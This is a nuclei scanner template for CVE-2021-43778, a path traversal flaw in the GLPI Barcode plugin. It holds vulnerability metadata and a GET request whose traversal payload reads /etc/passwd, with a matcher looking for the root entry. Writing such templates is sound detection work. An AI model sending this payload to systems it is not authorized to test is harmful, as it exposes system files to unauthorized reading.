nuclei-templates/cves/2021/CVE-2021-43778.yaml

31 lines
1003 B
YAML
Raw Normal View History

2021-12-01 07:04:29 +00:00
id: CVE-2021-43778
info:
name: GLPI plugin Barcode < 2.6.1 path traversal vulnerability.
author: cckuailong
severity: critical
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file..
reference:
2021-12-01 13:49:10 +00:00
- https://github.com/AK-blank/CVE-2021-43778
2021-12-01 07:04:29 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-43778
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2021-43778
2021-12-01 13:49:10 +00:00
tags: glpi,cve,cve2021,lfi
2021-12-01 07:04:29 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"
2021-12-01 13:49:10 +00:00
matchers-condition: and
2021-12-01 07:04:29 +00:00
matchers:
- type: status
status:
- 200
- type: regex
regex:
2021-12-01 13:49:10 +00:00
- "root:.*:0:0"